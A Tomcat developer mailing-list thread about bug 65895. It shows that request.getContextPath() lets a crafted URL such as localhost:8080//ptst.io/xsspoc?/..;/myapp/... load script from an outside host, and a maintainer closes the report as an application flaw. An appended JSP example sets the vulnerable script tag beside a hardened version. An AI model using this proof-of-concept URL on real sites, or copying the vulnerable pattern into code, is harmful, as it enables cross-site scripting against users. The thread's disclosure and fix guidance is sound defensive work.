Posted to dev@tomcat.apache.org by bu...@apache.org on 2022/02/17 10:04:40 UTC
[Bug 65895] New: getContextPath() might introduce a xss cross site
https://bz.apache.org/bugzilla/show_bug.cgi?id=65895
Bug ID: 65895
Summary: getContextPath() might introduce a xss cross site
Product: Tomcat 9
Version: 9.0.58
Hardware: PC
OS: Mac OS X 10.1
Status: NEW
Severity: normal
Priority: P2
Component: Catalina
Assignee: dev@tomcat.apache.org
Reporter: hawkchen@potix.com
Target Milestone: -----
# steps to reproduce
1. you create a jsp page to include a js with the context path:
<script src="<%=request.getContextPath() %>/import.js"></script>
2. visit the URL below:
localhost:8080//ptst.io/xsspoc?/..;/myapp/contextpath.jsp
(assuming "myapp" is the application context path)
# Current result
a browser will load the cross-site script ptst.io/xsspoc
# Expected result
doesn't load ptst.io/xsspoc
# Other information
* I'm not sure if it's a bug or not, welcome any input
* someone mentioned this issue:
https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html
* I have tried this on Tomcat 7, 8, 9, all have the same issue
* tomcat maven plugin doesn't have this issue
<plugin>
  <groupId>org.apache.tomcat.maven</groupId>
  <artifactId>tomcat7-maven-plugin</artifactId>
  <version>2.2</version>
  <configuration>
    <port>8080</port>
    <path>/${project.artifactId}</path>
  </configuration>
</plugin>
* Jetty 9 doesn't have this issue.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org
[Bug 65895] getContextPath() might introduce a xss cross site
https://bz.apache.org/bugzilla/show_bug.cgi?id=65895
--- Comment #2 from hawkchen@potix.com ---
Thanks for your reply.
I have checked that tomcat7-maven-plugin is 7.0.47 which doesn't include bug
57215.
[Bug 65895] getContextPath() might introduce a xss cross site
https://bz.apache.org/bugzilla/show_bug.cgi?id=65895
Mark Thomas <ma...@apache.org> changed:
What       | Removed | Added
-----------|---------|---------
Status     | NEW     | RESOLVED
Resolution | ---     | INVALID
--- Comment #1 from Mark Thomas <ma...@apache.org> ---
That is an application security vulnerability in the JSP, not an issue with
Tomcat.
The Servlet spec requires that request.getContext() returns the original,
undecoded path.
My assumption is that the Maven plugin is using a version of Tomcat that
doesn't include the fix for bug 57215.
If Jetty isn't returning the original context path then that is an issue for
Jetty.
Generally, applications should be using application.getContextPath() which
returns the canonical context path.
This behaviour is an argument for the deprecation and eventual removal of
request.getContextPath() - or for its behaviour to be changed to match
ServletContext.getContextPath().
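An added example (not from the bug report or from Tomcat's own code) that puts the reporter's vulnerable line next to the fix Mark Thomas recommends, with a diagnostic check that logs requests whose raw context path differs from the canonical one. It assumes a JSP deployed under the context path /myapp on a Servlet 2.5+ container; the log message text is my own.

```jsp
<%@ page contentType="text/html; charset=UTF-8" %>
<%
    // request.getContextPath() returns the context path exactly as the client
    // sent it (undecoded, as the Servlet spec requires). For the URL in the
    // report, localhost:8080//ptst.io/xsspoc?/..;/myapp/contextpath.jsp, it is
    // "//ptst.io/xsspoc?/..;/myapp", not "/myapp".
    String rawContextPath = request.getContextPath();

    // 'application' is the implicit ServletContext; its getContextPath() is the
    // canonical path the container deployed the application under ("/myapp")
    // and does not depend on anything in the request.
    String canonicalContextPath = application.getContextPath();

    // Added defensive check: a mismatch means the client reached this app via
    // an unusual encoding of the context path, which is worth recording.
    if (!rawContextPath.equals(canonicalContextPath)) {
        application.log("context path mismatch: raw=" + rawContextPath
                        + " canonical=" + canonicalContextPath
                        + " remote=" + request.getRemoteAddr());
    }
%>

<%-- VULNERABLE (the line from the report): the raw value lands in the src
     attribute, so the browser resolves "//ptst.io/xsspoc?/..;/myapp/import.js"
     as a protocol-relative URL and loads the script from the other host.
     Note that HTML-escaping this value would NOT help: the payload contains
     no characters an attribute encoder changes. --%>
<script src="<%= request.getContextPath() %>/import.js"></script>

<%-- HARDENED: build the URL from the canonical context path instead. --%>
<script src="<%= canonicalContextPath %>/import.js"></script>
```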